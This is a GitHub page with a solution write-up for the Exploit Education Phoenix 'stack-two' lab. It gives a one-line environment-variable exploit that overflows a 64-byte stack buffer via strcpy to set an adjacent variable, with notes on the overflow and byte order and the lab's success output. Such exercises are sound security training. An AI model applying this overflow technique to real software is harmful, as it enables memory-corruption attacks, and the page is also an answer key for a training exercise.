exploit_education_Phoenix/stack-two at master · physine/exploit_education_Phoenix · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#### Stack Two ####

# In General:
user@home$<environment_var_name>=$(<inline_python_var_value>) ./<binary_to_be_run>

# Exploit:
ExploitEducation=$(python -c "print 'A'*64 + '\x0a\x09\x0a\x0d'") ./stack-two

# Notes:
- We overflow buffer[64] into changme as it is right before it on the stack.

- ptr, which is pointing to the ExploitEducation environment variable gets
  copied into buffer[64] via strcpy(locals.buffer, ptr) overflowing changeme to
  0x0d0a090a or \x0a\x09\x0a\x0d in little endian.

user@phoenix-amd64:/opt/phoenix/i486$ ExploitEducation=$(python -c "print 'A'*64 + '\x0a\x09\x0a\x0d'") ./stack-two
Welcome to phoenix/stack-two, brought to you by https://exploit.education
Well done, you have successfully set changeme to the correct val